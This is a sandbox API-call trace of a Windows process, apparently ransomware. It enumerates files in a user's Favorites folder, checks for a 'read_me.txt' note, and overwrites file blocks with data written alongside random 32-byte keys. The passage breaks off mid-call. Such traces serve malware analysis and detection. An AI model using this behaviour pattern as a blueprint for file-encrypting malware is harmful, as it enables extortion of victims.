[0078.069] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c3dcb0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0078.069] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt") returned 68 [0078.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x810 [0078.069] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0078.069] CloseHandle (hObject=0x810) returned 1 [0078.069] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c3dcb0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16c3dcb0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16c3dcb0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0078.069] FindClose (in: hFindFile=0x2b2478 | out: hFindFile=0x2b2478) returned 1 [0078.070] wnsprintfW (in: pszDest=0x8a60090, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\read_me.txt") returned 68 [0078.070] GetProcessHeap () returned 0x280000 [0078.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a60090 | out: hHeap=0x280000) returned 1 [0078.070] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 63 [0078.070] GetProcessHeap () returned 0x280000 [0078.070] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b40018 | out: hHeap=0x280000) returned 1 [0078.255] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.258] ReadFile (in: hFile=0x83c, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.320] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.320] GetProcessHeap () returned 0x280000 [0078.320] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.320] GetProcessHeap () returned 0x280000 [0078.321] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.321] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.321] GetProcessHeap () returned 0x280000 [0078.321] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.321] ReadFile (in: hFile=0x83c, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.385] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.385] WriteFile (in: hFile=0x83c, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.385] GetProcessHeap () returned 0x280000 [0078.385] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.385] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.386] GetProcessHeap () returned 0x280000 [0078.386] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.387] GetProcessHeap () returned 0x280000 [0078.387] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.388] GetProcessHeap () returned 0x280000 [0078.388] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0078.389] GetProcessHeap () returned 0x280000 [0078.389] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0078.389] SetFilePointerEx (in: hFile=0x83c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.389] WriteFile (in: hFile=0x83c, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0078.390] WriteFile (in: hFile=0x83c, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0078.390] GetProcessHeap () returned 0x280000 [0078.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0078.390] GetProcessHeap () returned 0x280000 [0078.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0078.390] GetProcessHeap () returned 0x280000 [0078.390] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0078.390] CloseHandle (hObject=0x83c) returned 1 [0078.391] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 46 [0078.391] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.391] ReadFile (in: hFile=0x840, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0078.391] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.391] GetProcessHeap () returned 0x280000 [0078.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0078.392] GetProcessHeap () returned 0x280000 [0078.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9ccf8 [0078.392] SystemFunction036 (in: RandomBuffer=0x7d9ccf8, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9ccf8) returned 1 [0078.392] GetProcessHeap () returned 0x280000 [0078.392] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0078.392] ReadFile (in: hFile=0x840, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x1000, lpOverlapped=0x0) returned 1 [0078.448] SetFilePointerEx (in: hFile=0x840, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.448] WriteFile (in: hFile=0x840, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x1000, lpOverlapped=0x0) returned 1 [0078.448] GetProcessHeap () returned 0x280000 [0078.448] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0078.448] GetProcessHeap () returned 0x280000 [0078.448] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d068 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.449] GetProcessHeap () returned 0x280000 [0078.449] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.449] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0078.450] GetProcessHeap () returned 0x280000 [0078.450] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0078.451] GetProcessHeap () returned 0x280000 [0078.451] HeapFree (in: 